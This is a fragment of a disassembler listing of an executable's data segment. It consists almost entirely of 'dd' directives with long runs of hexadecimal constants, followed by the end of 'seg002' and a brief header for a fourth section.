dd 92410CDBh, 0A931B1B7h, 14999EA4h, 319A6A51h, 9C7BF7B5h
dd 0E5A0A0A0h, 8284D911h, 4B003BF9h, 1C37F76Dh, 0CF5C6868h
dd 342BEE70h, 21BC93EFh, 0CCFC5BDEh, 354AC2C7h, 0A4E9AB11h
dd 84FD9AF5h, 2C81868Bh, 5802A146h, 89591E6Dh, 40454A43h
dd 2CBCBB3Eh, 69062227h, 85090E13h, 0A9A3AA01h, 3966F5B5h
dd 4BCDD2D7h, 0E855C67Dh, 2929A9A4h, 0A091969Bh, 0CCEC77A7h
dd 0E1644847h, 50555AD3h, 1C2153F0h, 492A1217h, 10D03FEh
dd 0E0E16612h, 42723228h, 644502CAh, 457A635Fh, 0DA85BD81h
dd 0C4B6D5CEh, 8848D951h, 841F8F86h, 8F656A4Ah, 0B99C2879h
dd 38FD77EBh, 7479EE02h, 9FD4A4Fh, 0B801060Bh, 0BC97A98Ah
dd 0D4BDBFC6h, 0AEA53F52h, 6C36B6FBh, 0D1CCD813h, 723F131Ch
dd 48267A3Fh, 0DC61686Bh, 789FA3A8h, 625DB316h, 0ADB22AEFh
dd 0CD1311Ah, 244635D7h, 35371E24h, 244AA910h, 3BC106F8h
dd 15E896B3h, 9459B3B7h, 0F5054D17h, 6CB18BA6h, 0B1C4B68h
dd 131D1416h, 0F4FAEC00h, 2E400FF0h, 6638452Ah, 5D4C3A4Fh
dd 8F908E81h, 9990B28Ah, 0CEA2B4B5h, 0D6CEE4BFh, 0E600F3EEh
dd 0C09CBDFh, 451B110Bh, 352D5E31h, 6C6A715Dh, 78806583h
dd 1F1D2427h, 4090E23h, 0C7C3CAFFh, 0C2FECFE3h, 27EC04F0h
dd 2C1A2A24h, 34358838h, 4F4A649Bh, 8A6AA23Eh, 96988289h
dd 9D5BABA5h, 1CEF8B9Ah, 381B22E0h, 344A2E30h, 0E0EFEAE1h
dd 3327E3F1h, 0B6FD2020h, 7077775Dh, 86AB48Ch, 9CA1A6ABh
dd 143A13DCh, 3279BE78h, 205A01ECh, 0B99C565Bh, 38FD77D3h
dd 5034D6F4h, 8B0F7423h, 0BCD656B8h, 0EC59BBF7h, 0B2EFB305h
dd 0C5609850h, 412E99E8h, 98DDD8E7h, 5387241Ah, 0E51A601Ch
dd 9C3050E8h, 0B8D2D157h, 2E397E52h, 943BF0A8h, 9D5854DDh
dd 93486408h, 556E7B32h, 20D51ACCh, 0C257C631h, 0B51147DAh
dd 88189E63h, 0AD89826Bh, 6C751E62h, 16AC6267h, 0D1744E12h
dd 30F54FB7h, 0B3ADEE93h, 810AABAh, 3248FE03h, 0B3B099AEh
dd 544615DBh, 50BD82F4h, 5B544A84h, 7764D077h, 7FFE857Eh
dd 0C06D3286h, 54595E6Ah, 928A7D7Ch, 684B282Ah, 1F1D5E5Bh
dd 0C4FE8A80h, 0F0FB52FFh, 0EFF4E6EBh, 1EF60407h, 0B4FA240Fh
dd 581AB95Fh, 15915688h, 0B8B25604h, 0E95A7D73h, 904D3AD4h
dd 0FAC6CF4Bh, 0D92DF221h, 41A59376h, 18740A4Fh, 0ECF1F6F7h
dd 0C0CA975Ch, 4992CE93h, 70C7D644h, 2A530EABh, 47AF413Ah
dd 0B486E500h, 0E375796Fh, 0C3EFFB8h, 0A5CA4247h, 24692B0Eh
dd 117B4E4Fh, 0A4AF0671h, 68EDF2F5h, 2095336h, 804ACA0Fh
dd 31CFEB11h, 58BAEC1Ch, 821F4093h, 75580FF4h, 8A95662Bh
dd 7A9EA2A7h, 626DB316h, 47DD2AEFh, 0CC2302A8h, 2D824807h
dd 0E4E92ECBh, 0D0D5D6B7h, 83701DCBh, 0BA9C6D76h, 585562C5h
dd 4FA198Fh, 0DF71B668h, 585D69BFh, 0BEDB53h, 0F935FA27h
dd 0E9ADE3B0h, 39B51257h, 0DCE4DDCDh, 0E0E5EAE3h, 958B9FA6h
dd 8E918779h, 0A4E5FAEFh, 0BD110F62h, 0BC0686CBh, 6990F66Ah
dd 3CE85E63h, 40454A4Ch, 24AFABC0h, 8D762267h, 0C4FB0668h
dd 5EEB52FFh, 3160655Eh, 0C80DC8DBh, 763DCDC3h, 21A5AAB0h
dd 8C9226BFh, 79655687h, 1B696E74h, 906A26CCh, 0AC85C74Bh
dd 0D82D3238h, 14EF52AAh, 47A993Dh, 69F136E5h, 0CD522BA7h
dd 0C4D8567Bh, 542A09BFh, 47A166D8h, 0E10A1535h, 7479BE78h
dd 0DDF243FCh, 4C117300h, 30D2B117h, 0A1296EFDh, 3B9919DFh
dd 8701060Ch, 0E874EEB7h, 5154EE36h, 0C005B7E8h, 0C4EE3B75h
dd 329EA2E7h, 2E8A3893h, 7CEAC97Dh, 0DF612695h, 0C45801FFh
dd 34393F31h, 0BD9AA79Eh
dd 0F611D630h, 7FCCD417h, 24DBF260h, 0C7955FDFh, 0BCC1B848h
dd 262A2FB7h, 45995E98h, 2AE12287h, 0D8C9352Eh, 0FE5D6267h
dd 30C2743Ah, 0BD90EE5Bh, 1C615BC3h, 0EDA17F8Ch, 0F5AAFE43h
dd 7FB5707h, 0E895610Eh, 0B01D03D7h, 0A08DF2BAh, 8B9D7A60h
dd 2C79AAC7h, 686D778Fh, 82738363h, 0E7784A57h, 6C468AC8h
dd 0CE1A527h, 0E40BD54Dh, 0F5766F74h, 0DCF7E6ABh, 0C8CDB3EFh
dd 0AB08F0C3h, 60779A1Ch, 0A85D239Bh, 0E5F85993h, 64A943ABh
dd 4A6D5E19h, 0EC41B08Bh, 95680502h, 14D93413h, 6592B00Eh
dd 0EC311359h, 0CC45E23Dh, 93C9CED3h, 0C02A096Eh, 71A166D5h
dd 888D928Bh, 21F6CBD0h, 60254021h, 640EE3E0h, 0EE644207h
dd 727A2E59h, 48AE94Eh, 7F014635h, 0FFA7F21Fh, 59436954h
dd 97081Ch, 7EAE26BBh, 38AD1739h, 0BBAFA6BBh, 7F435BC2h
dd 6BDE6FCAh, 0C3F3ED58h, 0B9F36906h, 0E0F7E874h, 8BB5491Bh
dd 2BB65D72h, 0D2E96386h, 7555DA1Fh, 0BC81DB36h, 809366B8h
dd 949973B3h, 6DE1FF12h, 1F176BBh, 589D8A9Ch, 835AE253h
dd 0F03213BCh, 1C21262Bh, 3D92D817h, 0F4F93E1Bh, 7FFA008h
dd 4C561D0Eh, 0B8BD82D4h, 0F929AEB3h, 85959E5Dh, 2261D591h
dd 8817110Ah, 38794446h, 216A7068h, 7851851Bh, 0F8827F80h
dd 0A7E9BD9Fh, 0D2DAD6DCh, 0F9F5C7D9h, 0E8D3CFB8h, 0D4D9DEE3h
dd 4D348A62h, 5E764340h, 8A5E69A7h, 4583938Fh, 0AD835454h
dd 0C8DBABAFh, 0FBDCD7CBh, 0FC39F707h, 29151A30h, 484B17DBh
dd 68554707h, 657D7170h, 0D0E18E91h, 0C2C29A9Ah, 0E7B7ABB3h
dd 79969E99h, 0C062165h, 322AFEFAh, 4C1E6222h, 454D0E57h
dd 66763A68h, 0A59B2667h, 0FCA18A92h, 0C6B4C403h, 0D9D3F0AFh
dd 0FF15E4D8h, 27BDDBC7h, 7E3D3734h, 48287474h, 3C865848h
dd 68728478h, 58AEAD9Ch, 0B9B3D00Fh, 0DFF5C4B8h, 0FBC222Ah
dd 0C4CA1318h, 29F52E18h, 6555E63Ah, 0C88E574Ch, 87BC726Ch
dd 0ACA6A66Fh, 766E5798h, 48FF7680h, 23BA6870h, 40D72E2Eh
dd 5CF4F8F3h, 18D09613h, 3BCD57E8h, 825E47AAh, 0E668AFA6h
dd 0D8A72B9Dh, 0BED86FC5h, 520156C3h, 0B4C939D9h, 686D7277h
dd 54595E63h, 40454A4Fh, 2C31363Bh, 181D2227h, 4090E13h
dd 0F0F5FAFFh, 0DCE1E6EBh, 0C8CDD2D7h, 0B4B9BEC3h, 0A0A5AAAFh
dd 8C91969Bh, 787D8287h, 64696E73h, 50555A5Fh, 3C41464Bh
dd 282D3237h, 14191E23h, 50A0Fh, 0ECF1F6FBh, 36826547h
dd 0C4C98EACh, 0D95B5F3Eh, 0A3A1A66Bh, 0FDA1D502h, 237476B2h
dd 0B0647026h, 68751AE2h, 4A49045Eh, 2C67092Ch, 529C0E6Eh
dd 0BF3117h, 0F14F8770h, 5152DEA3h, 0C0059325h, 6E30BB62h
dd 397684BFh, 0C8992D1h, 3093D1FCh, 5C85CE6Bh, 68755257h
dd 0B9393E43h, 0E0030EACh, 41AEF1Bh, 0B87CFEF3h, 9B9C90EFh
dd 10EE585Ch, 0F5D489CBh, 0CAE02FB6h, 0A4F89E63h, 0F7219A12h
dd 6849F97Bh, 0BDE65845h, 4409302Fh, 1C3544BEh, 1FEF5128h
dd 3E9A2245h, 4A4036D7h, 8CE5B46Eh, 37DF15D7h, 0A8AB31C6h
dd 5B54E55Bh, 0AB5FB562h, 3C4A3010h, 236C3A77h, 0D1D4A16Fh
dd 408513BDh, 45ABBBF6h, 181D2267h, 0F8210E13h, 6BF5FAFFh
dd 1CAA7468h, 97026AD7h, 0CC919D96h, 23A5AAAFh, 4C9A2410h
dd 70728287h, 46C9EBFCh, 0D43C5A9Fh, 15BBD33Eh, 9F6C32F7h
dd 0D44290A0h, 767A830Fh, 0D4F136F4h, 0D8DDE2E6h, 4F0817A2h
dd 0B0B53A2Eh, 413978ABh, 8B484139h, 0B4A228F0h, 0E3976D6Fh
dd 53516211h, 383E49C3h, 344FB133h, 0F599191Fh, 8701060Bh
dd 40BDEEB5h, 4B443C2Bh, 0A92B4FCEh, 6AB0B6FBh, 18A51CF7h
dd 9D3D8EACh, 5C9FC3FFh, 0EDF8266Ah, 0C94E8ACEh, 0B04FD24h
dd 0DC3EAB52h, 0D911E2DFh, 0B024CB5Bh, 0EB8F8772h, 0D0D57152h
dd 54422CCBh, 9F9BA5D9h, 94994920h, 6A04C08Fh, 0F776AB7Bh
dd 5A44729Dh, 754858DAh, 960392F0h, 6920A59Eh, 84DFB6Dh
dd 6CB983A8h, 5C69E9F6h, 23D1D6DBh, 0F8F65C74h, 0F141DEB3h
dd 93706961h, 3C4A3008h, 2F2F177h, 57591E7Ch, 0C3742E4Bh
dd 0E74038FBh, 3B25D81Ah, 0E4428E01h, 0C193BAEh, 0B8CD0FE7h
dd 0F3B1CEB0h, 3592A903h, 0BD8A9B6h, 0D9B4AF0h, 8E421AEEh
dd 0E55B822Ah, 0F16C8326h, 0BD1BBA3Eh, 0B50B885Eh, 953BF2C7h
dd 48AE7D96h, 6DDB2AAAh, 80C64FCEh, 45DB62E2h, 0CDD08006h
dd 1D9B9A0Ch, 0A588823Eh, 6B7BD264h, 203EDCDCh, 1DAA315Bh
dd 5EB8B1AAh, 0CD3DF0B2h, 0F7F0E8F2h, 0F89706CAh, 36020ABFh
dd 61513D36h, 0C005AE80h, 0A4C22ED5h, 0B45D84A5h, 22A79092h
dd 38775416h, 0F3F6E0D3h, 400BD5FAh, 318FEFBEh, 4D5242D7h
dd 6691554Eh, 4804F506h, 0B56EF023h, 6AD51AFBh, 6457EDB2h
dd 0F22D0C7Fh, 44A173A2h, 2D522280h, 6DF9352Eh, 0D45D6267h
dd 9546E281h, 8B7B889Fh, 74269195h, 880D1217h, 0B7A4E0AAh
dd 0CCC13764h, 4924D69Bh, 0B87DF6F8h, 24A9AEB3h, 0F0259DEBh
dd 4D067D31h, 6B6D3263h, 5B5A5E63h, 4045E0CBh, 0B766AE3Bh
dd 73C4FAFBh, 0FD9B6B9Ch, 4885FABFh, 59749191h, 0C80DC6C8h
dd 0B5B9BEC3h, 891BF728h, 5765965Bh, 44AE07F2h, 64696EB3h
dd 0AFED5C5Fh, 0C91345A7h, 4D09A34h, 0F2B04CAAh, 1E050A57h
dd 7CF02A62h, 55D07C2Ch, 0C489A2A4h, 0A8B5BABFh, 0A4BE3363h
dd 579FC797h, 0B4AD8F00h, 60656A6Fh, 89D0CE57h, 3531423Fh
dd 0DCC6B18Bh, 0FF60B51Fh, 0BCD53788h, 0E8EDF5F7h, 84DDB2E3h
dd 3B2C2468h, 0ECBA4C38h, 73681DA7h, 0B84117DBh, 9C86FFCAh
dd 5C60662Bh, 6F815257h, 2B9DA5DBh, 0A682A3F9h, 0B711D614h
dd 17FD02AFh, 6D51590Fh, 6BD5DAF9h, 0D3CB83B3h, 8D22DAh
dd 0B04FAE6h, 0E8A7532Eh, 17D38B2Eh, 0C5E4FDF8h, 44092224h
dd 72886C8Ah, 1C21262Ah, 77B52644h, 0A4E4DDD5h, 44E02D2h
dd 64B3150Eh, 139FD72Ah, 6B201924h, 0B90F1F16h, 0C45886CBh
dd 0B7A92AF0h, 148D6FE0h, 40454E4Fh, 0C41F6A3Bh, 5017E240h
dd 4401667Ah, 989CFECBh, 0FB785ED8h, 0D952892Eh, 0BCB9FECFh
dd 4DA5AAAFh, 0B31E1661h, 787D42B3h, 4DD1AF7Fh, 4A1E7347h
dd 0FC1571E8h, 2B517237h, 4030C329h, 706C0A4Fh, 6967606Ch
dd 0D81D16FAh, 0CE891E39h, 70C9D53Ch, 0F4C350ABh, 5403F35h
dd 74B99294h, 60656A5Fh, 15E15D07h, 45F528DDh, 948054C7h
dd 0D024B4F7h, 7E4E8FB2h, 37EDB2E0h, 940DEF60h, 0C0C5AACFh
dd 3CAAEBBBh, 71229CEFh, 0EE894E5Fh, 0B0F60259h, 2832EBD6h
dd 488D5297h, 37AD3E43h, 1A0D6EAFh, 0CC25FF78h, 71A4E807h
dd 24D27448h, 4DA875DFh, 0BC81FAFCh, 68ADB2B7h, 6449A770h
dd 6C6E0F8Dh, 3B0776BBh, 189193E4h, 4449CE53h, 0E03C0F3Fh
dd 6A630E3h, 0A20D5203h, 0AC5B1BEAh, 5DF8D2C0h, 0CC91CACCh
dd 0B8BDC3C7h, 8D19B0BFh, 0BCBB3F95h, 98C186CBh, 82D26C76h
dd 32591E6Fh, 0C19D70A6h, 3DB6EDEBh, 181D6253h, 0B1090E11h
dd 0EA3D8EFDh, 1CB51088h, 4134F8D7h, 0F4E26058h, 7C81F2AFh
dd 0DB28969Bh, 0B8B1B304h, 64697673h, 3FC1AE5Fh, 0FC1577C8h
dd 28313237h, 0C410F323h, 0DB8A0457h, 96F136E7h, 55D01FBEh
dd 0C489A2A4h, 0B0B5B2BFh, 0F4C3B798h, 25933216h, 74B992AAh
dd 0A034C509h, 2A4681C1h, 32555BEFh, 641D1990h, 13F9DA1Fh
dd 0C8D8AB11h, 838FF2B7h, 0A632Eh, 0D0C5CA0Fh, 4413B6BBh
dd 9B116228h, 8E81D213h, 3089951Ch, 63B84C6Bh, 5438D7C1h
dd 23D03E83h, 0E0F9FBACh
dd 0C11161Bh, 4806F6C7h, 0CD6EF023h, 6AD51AEBh, 88924BB6h
dd 0C8ADB277h, 12499EA3h, 7C898C9Ch, 0F63BC500h, 18917B04h
dd 0CEC6D753h, 0E35FA48h, 19ADA6D2h, 87D1944h, 34E44D83h
dd 0D16A0145h, 0CCD196C7h, 0D6BDC287h, 0D19AD40Bh, 0EEBE2E9Dh
dd 86693632h, 28614DF4h, 57B99E63h, 0EFCD9AA5h, 6C4527B8h
dd 189D2227h, 7407A313h, 99A7479h, 0FAE1A617h, 0C589522Eh
dd 0B469C510h, 60C0692Fh, 9D16CD01h, 787D42B3h, 91696F73h
dd 4A95EA56h, 0FC156FC8h, 1F548C37h, 5498B6FDh, 0ECEE6F05h
dd 9753F63Bh, 0E783E397h, 84BD9F50h, 0B2B5BABFh, 2B7C9BABh
dd 0C8818314h, 70797E83h, 0D05BFF6Fh, 77D6609Bh, 0B23D0273h
dd 641DFE90h, 20F5DB1Fh, 7DA3BE65h, 43ED624Eh, 0DE996EEBh
dd 99A54Ch, 298420BBh, 98DDD6D8h, 84818E93h, 18576A4Ch
dd 0B957CEEAh, 488D462Dh, 35E9E99Dh, 0D8752246h, 18279B21h
dd 87A302C7h, 24DDBF70h, 0E0D5DADFh, 495677CBh, 2B255894h
dd 0BE3EA8FBh, 9E85CA5Bh, 163169E2h, 21E30F80h, 0C17C4E13h
dd 30F54E50h, 1C01262Bh, 577E2144h, 0AC5BF9EAh, 3DEBD2E8h
dd 0CC91CAC1h, 0B2BC2607h, 0E49D9810h, 0A93C009Fh, 3C4A1040h
dd 0E2AEEC77h, 1482E800h, 0B0AC704Fh, 55B63893h, 721D6253h
dd 0F0FA931Eh, 0F0F4FABFh, 58DCE7EBh, 0C8CDD252h, 3F1D255Bh
dd 91322589h, 0D915687h, 787D82F8h, 642A0571h, 0BD545A5Fh
dd 0D8E4FE48h, 0B09410B2h, 14191E23h, 0FE1A6529h, 0C9686E15h
dd 74957D41h, 2FCB5D6Eh, 4B97FACEh, 68722B16h, 888D92D7h
dd 0B4EE7F83h, 4C36EF7Ah, 4C51561Bh, 16313A47h, 48A6864Dh
dd 3C269FEAh, 0FC01064Bh, 55F8F4F7h, 0B23AE824h, 0ED8E4E26h
dd 0C839DCC3h, 0B34408A3h, 0EE81DE82h, 185778D6h, 0D95F4343h
dd 488D462Eh, 3710E99Dh, 4F8B637Fh, 0CC250798h, 0F8FD0207h
dd 54C90273h, 0E95AF4DAh, 0FDC106F7h, 21BABCD7h, 9699C2ABh
dd 0C05963ECh, 6F55367Bh, 0B36126E7h, 0E29FEFA3h, 2A9589C7h
dd 5CF54FC8h, 0D7743817h, 342D0F80h, 0E0E5CAEFh, 1B808ADBh
dd 0F8F1F344h, 0A4A9AEB3h, 7FA2EEBFh, 7C818946h, 0F8722677h
dd 0C7B008D3h, 0B5CC11C6h, 2C712FB9h, 0D9A6E33Eh, 0ED15E27h
dd 0B009137Ch, 597490EBh, 0C80DC6C8h, 0B4F9BEC3h, 847A63Bh
dd 987D96Bh, 783DB6A0h, 0DC8B781Ah, 0ED5B3A22h, 3C017A74h
dd 0A5608DD1h, 14D93234h, 1050A0Eh, 69C42927h, 0D81D1618h
dd 0A4C9CED3h, 0EF08B78Bh, 9CA1A6AAh, 0F8FD97C3h, 0FF686929h
dd 0EAEAE5A2h, 77511654h, 0BC05BB7Fh, 0A1DCF702h, 10552E30h
dd 0FC81060Bh, 657AF0A4h, 0D499F20Ch, 4005C245h, 8400B974h
dd 546AA61Ch, 0C5897E6Fh, 0EB0572DFh, 7A63C912h, 0A60D43BFh
dd 0BBE1A4EAh, 207DC2AFh, 6D0F161Bh, 53D59DE1h, 0E21EB770h
dd 90E66239h, 0FF117125h, 0AC322F0Dh, 3995EAFh, 0C0595B0Ch
dd 6C71767Bh, 75FD777h, 6F11663Ah, 48E4B528h, 0CCF89E52h
dd 116B8F8Eh, 81FAFE43h, 0E0A5B36Dh, 8848CFDCh, 0FD46C6E3h
dd 0A4E99ED8h, 0B9172716h, 0F95886CBh, 682D5BF5h, 808AE3AEh
dd 40854A8Fh, 2E85363Bh, 5AC4EA12h, 0D3DB0E0Fh, 199F877Eh
dd 0E3E1E6ABh, 0C8CE9B53h, 0B4B6A6C3h, 5D6CAAAFh, 50566469h
dd 0B4A7B4B6h, 1B69BAB7h, 906AD2CCh, 92C6CF4Bh, 0DB2DF220h
dd 1745D6AAh, 0D81499B7h, 0D4053982h, 0DFD8D8CBh, 0BD2B435Ah
dd 0B36CBA7Fh, 191AB269h, 88CD7B55h, 0FD71C082h, 203EB0ECh
dd 7420E15Bh, 38BDF5AAh, 0F1C12E33h, 8BF0E9E9h, 0BCCAACC0h
dd 2115C8F7h, 5F443D2Dh, 9E303Ch, 0B4E741BBh, 73A9DCA6h
dd 81A211D5h, 7155F272h, 0D85C666Bh, 484D539Dh, 6DCFD342h
dd 8D242AEFh, 0CD10FC9h, 0EF652E9Bh, 0E4E95070h, 0CC1757DFh
dd 954F4BF2h, 0A6ACB277h, 21B0653h, 0E5041912h, 6CB16FD5h
dd 2364D767h, 0C7445A0Eh, 30353B26h, 89EA3292h, 84DFB71h
dd 0F5F68306h, 5DE4EAEFh, 0CC91CF89h, 3FF543A1h, 582EBD90h
dd 0B959A9Fh, 3F5888CBh, 21954263h, 8DC4BDADh, 801EB094h
dd 8B6453Bh, 1B1D2227h, 0C4F27890h, 0E27AFDFFh, 67E1A624h
dd 0BC10ADD7h, 0B47640C6h, 5F7CAAAFh, 0C810A5A3h, 0FB7D8287h
dd 0A3687033h, 0C2DA5D4Bh, 0EE418684h, 0AEA26107h, 8B19DE3Ch
dd 40DA427Ch, 0AC7650FBh, 0D89067DAh, 58E2CED3h, 0D4B5BABFh
dd 826B51Eh, 88D9297h, 0F1747395h, 60656AE6h, 77521CE2h
dd 0D00D7606h, 0DBD4C3EBh, 39B7A728h, 8B96064Bh, 0F15377F6h
dd 51D8DEA3h, 0C00593DDh, 0C5673B44h, 9824A2E7h, 7DC7136Ah
dd 68437A3Fh, 3523EBA2h, 0A17B5297h, 34393E58h, 38F8BCBFh
dd 0C11162Eh, 7379C07Ch, 0E7E7D9B4h, 4DECCA1Dh, 0BC81FF91h
dd 0E42CAE64h, 1BCAFD93h, 0A1816ECBh, 0F3309122h, 1896F4E4h
dd 0B1C0EE53h, 30F5430Dh, 0B3B31C93h, 87633BAh, 6179FE03h
dd 0D4A8C5E1h, 8BD8DF89h, 7C3BC1BFh, 0ED544D46h, 76231F92h
dd 50F8857Eh, 79D0F353h, 0CB595E7Fh, 0DB60D9D2h, 4867B72Fh
dd 381D2287h, 8F49E1D5h, 6D781EF3h, 0DC211F8Dh, 0E4C23B4Ch
dd 31B8BEC3h, 0A065733Dh, 5236FB35h, 0BA7CC89Eh, 68A7595Fh
dd 282CA019h, 3CEFC706h, 28323237h, 0D2921E23h, 0C33F3993h
dd 42B6B80h, 0DF2FE227h, 84BE6A40h, 170D3DBFh, 9CE82AAEh
dd 5169297h, 74B997B1h, 87176A05h, 0C66CAE8h, 2F7DC747h
dd 242992AFh, 60D5351Fh, 0AC00705Bh, 0E895F38Dh, 0A219DEE3h
dd 0AD013F52h, 8430B6FBh, 5E21A18Ah, 0D898E90h, 308E30FCh
dd 96DEF36Bh, 0BD4D9240h, 7462A0B0h, 0BAD3DB2Fh, 795CE61Bh
dd 0F8BD3783h, 0EB948672h, 0D0DAD65Bh, 0D3C130CBh, 68A68824h
dd 142EFDA3h, 385CA5Ch, 0E86C3533h, 585D6654h, 3DDFD3DCh
dd 69443AFFh, 4C52692Ah, 39112C68h, 2D4B93D6h, 6D00EAAFh
dd 0CC91CB7Bh, 34C80244h, 0A4A9B264h, 0D1E53AEh, 7C41BFEDh
dd 403E4348h, 54545E56h, 0A0BAD97Fh, 0A9317628h, 92A121E7h
dd 8D090E0Fh, 0B00ECC7Ch, 0A12929EBh, 43CDD2F0h, 31ACD60Ah
dd 0A0657E80h, 7C91969Bh, 0F57C8874h, 64A95E98h, 11540C6Eh
dd 5D543736h, 31E3B7B0h, 4FC11EE3h, 7B050AEBh, 69F0F242h
dd 0D81DF23Ch, 5C800A2h, 11080B0Ah, 75B32B34h, 7F4C92D7h
dd 6D7BC90Eh, 33F23F8Eh, 0FE46573h, 718D4553h, 2701EF5Ah
dd 572B9BCFh, 159B6F76h, 0B26CFFA3h, 34C7DFE7h, 3BA10546h
dd 0EEB0CAF9h, 50E11FB7h, 67D2A5A6h, 4AFA85C0h, 1F6126A4h
dd 3831A6CEh, 0B6B4FE52h, 20252A77h, 774CA15Ah, 2EBA7FFEh
dd 98E92ECBh, 89E48956h, 4E62026Fh, 77639EB1h, 3EB9CAA1h
dd 1499B653h, 21C5646Fh, 70D2628Bh, 45C09772h, 0EDEDFF44h
dd 0F1181A2Bh, 85B5566h, 0EB288306h, 0E36CF9F2h, 928AADD0h
dd 9641C186h, 99544D46h, 0C6CADDCAh, 93680A8Eh, 176AA19Ah
dd 5B877122h, 0E7E03ACBh, 5F6133EEh, 94286173h, 3B342D10h
dd 55D250Eh, 0E36C655Dh, 8F877A53h, 9C87D196h, 0A0A5AA99h
dd 0E3DC45C3h, 787DDAEAh, 0E5B66E73h, 9080D434h, 3F0E2F4Bh
dd 6FD13237h, 6CEA931h, 1C054AD8h, 6D53D884h, 0CF331F09h
dd 0C4C8B450h, 0D46F35BFh, 1DC304AAh, 7FD2E27Eh, 74787400h
dd 6E24816Fh, 4C51365Bh, 3B46C73Ah, 67DB2E33h, 469C1C43h
dd 1085152Bh, 4BEDF2F5h, 0D5425FE7h, 0B7C5CAD0h, 0ACAF6435h
dd 9E6A7AA7h, 684ADA6h, 70757CDEh, 5F5130F2h, 48C54E8Dh
dd 85393F43h, 474B4847h
dd 3386064Eh, 49FDC233h, 0D45EBED3h, 2AD51AEBh, 74FAC4EBh
dd 0D4D5C65Fh, 1104FD09h, 42F9893Dh, 0D982184Ah, 589D9698h
dd 42E1737Ah, 0F9353A3Fh, 1C212C13h, 94B55A17h, 7EE4DDE9h
dd 0A0B9C36Ch, 0F6555CDBh, 0B87DF6E0h, 9082333Bh, 70739ADFh
dd 48520B76h, 68757237h, 5D4E5E63h, 2C2C97CFh, 7832367Bh
dd 0E9A219E4h, 709CEDFh, 0DCF6FAFFh, 0C52E6602h, 0C5CD12C3h
dd 69394E0Fh, 0A0657E85h, 0C344A98h, 0B8B19D2Ch, 0FA9D7373h
dd 7C66DF2Ah, 3C41468Bh, 21E1B237h, 4032BBA3h, 2F030A4Fh
dd 92967984h, 0D8DD2210h, 0FBFD5DFBh, 15F51202h, 7939251Eh
dd 38D9295h, 0B4A2D4F8h, 849F826Fh, 0C84C958Eh, 383D443Eh
dd 1D5783BAh, 569C1A5Fh, 242B093Fh, 2F281F3Ah, 0D54E60E6h
dd 0FA46CACFh, 0ACB1D697h, 4A971D87h, 902F913Dh, 0DF65447Eh
dd 9C3597E8h, 484D5257h, 0B9339333h, 0E0F9F67Ch, 0F18EA11Bh
dd 8BFDC217h, 0EB52254Fh, 45D5DAD8h, 7CB1C678h, 3912E5B7h
dd 79701A3h, 710A21EBh, 6C71B667h, 4F6D6267h, 4449B6CFh
dd 4804893Fh, 0B3B21593h, 0A6A28DBAh, 71F93E1Ch, 7269E91Dh
dd 57D1D6DBh, 0F8F6B474h, 0B4DF39B3h, 0F0B9D420h, 67A1868Bh
dd 6A1C6A2Dh, 4658A772h, 55D2153Bh, 0B731764Bh, 0D82D7F9Ch
dd 8FDBA013h, 8D741E03h, 0DC21F6D0h, 1D3055D7h, 0B4B9BEC3h
dd 0A1AD3426h, 0DB909E61h, 0F504F902h, 64A947EDh, 7C66DF2Ah
dd 3C01468Bh, 2AE13237h, 618166Eh, 79D5E303h, 2CFA6468h
dd 0B04C5DE7h, 41FC9ED4h, 0B075CED0h, 9CA1A66Bh, 704094C3h
dd 682D66B4h, 7B1E7972h, 7420595Fh, 6949345Eh, 7B8DC15Dh
dd 34AA9748h, 0F014637h, 0DFC7C153h, 535650F4h, 0C0C5CB7Dh
dd 0B8CC4BB1h, 9612A2E7h, 5231C03Ch, 40FD6C8Bh, 131DCEDEh
dd 0C3A301FAh, 7E384A89h, 11AA411Fh, 0C11D607h, 6D0D0207h
dd 0F71EF434h, 0F97F5758h, 39C0C60Bh, 0A86DC24Ch, 94764522h
dd 5B858A8Fh, 0F93C5EBAh, 589D8BC9h, 4417D5DCh, 0EEC03A3Fh
dd 0EDA69D4Bh, 80D5203h, 6079FE03h, 0BF0D9CEAh, 861C1514h
dd 81673F3Eh, 0A748AEF3h, 0BBDD518h, 0F9F896D1h, 682D5B21h
dd 4751287Ch, 388BC34Eh, 0AF21783Ch, 931D6A86h, 0C4F2A890h
dd 0C11D2FFh, 1EE2E6EBh, 0BCE1BCFh, 0DB4E48F3h, 0CFA56A7Bh
dd 4CA58718h, 787D8287h, 676B8263h, 9045B7D4h, 4B41FC4Bh
dd 0E82123B4h, 16191E23h, 0A6F91F0Fh, 0FD76ADB5h, 0D8DD2213h
dd 71C9D2D3h, 0E04A34B9h, 2BA166D7h, 0C8818314h, 74B97E83h
dd 0DA6CFF6Fh, 0F68F5856h, 0C79B9845h, 239F37DAh, 12BBDC2Dh
dd 0CF14E8D5h, 0A749645h, 0ACD76DBFh, 0A9F7174Eh, 0B3B1B6FBh
dd 9F941A23h, 36FEADA6h, 0D7753A88h, 9C36AAF8h, 9EC20157h
dd 2B397E5Ch, 0E0FAF69Ch, 0C68EA31Bh, 6DFDC230h, 24D21060h
dd 2A030BDFh, 6A16C5CBh, 0EFAD72A0h, 54CE3610h, 0CEDA198Fh
dd 4371B674h, 18928EF4h, 0ABEDB53h, 9735FA47h, 5CEAF8D8h
dd 75C86817h, 0F439138Fh, 0C9974F6Eh, 0FD1D69Bh, 0B8BDC21Fh
dd 0A5BFEBB3h, 0C3DE7720h, 8C2986CBh, 0E8F2B36Ah, 0D1591E50h
dd 0F8C40D0Fh, 0ED2CE6EEh, 0D832A2A4h, 14F65113h, 0DDF514FFh
dd 0F062CCFFh, 19F9CEB3h, 9C19B110h, 0C7C0B9EBh, 62E99B48h
dd 10F8F1EEh, 1B140D21h, 653078C0h, 2E159CC3h, 282D179Fh
dd 0B171FE23h, 2DA09992h, 83581F4h, 8E925F17h, 4FC98EABh
dd 3197B26Fh, 0AF9FACE1h, 88B5E874h, 0FF795D83h, 326504ABh
dd 0A4C6952Bh, 0BB3D0274h, 1AAA36EFh, 54302943h, 3A800978h
dd 33D40AF3h, 0CB313D36h, 0E1605952h, 0AC052E7Ah, 0E984A2A7h
dd 84897DEBh, 7065D27Fh, 3C1F666Bh, 483DBA57h, 37113E43h
dd 62252A2Fh, 0B88E16F7h, 0CE4AFE23h, 18E98672h, 0D0BD3AC8h
dd 47C1C6CBh, 4D9D9683h, 0F91A982Ah, 80C55E7Eh, 43566F23h
dd 541BC34Ah, 464A5453h, 5D343F3Ah, 0ED1A8644h, 80696Ch
dd 706E7Eh, 58h dup(0)
dd 1280h dup(?)
seg002 ends
; Section 4. (virtual address 00020000)
; Virtual size : 00001000 ( 4096.)
; Section size in file : 00000200 ( 512.)
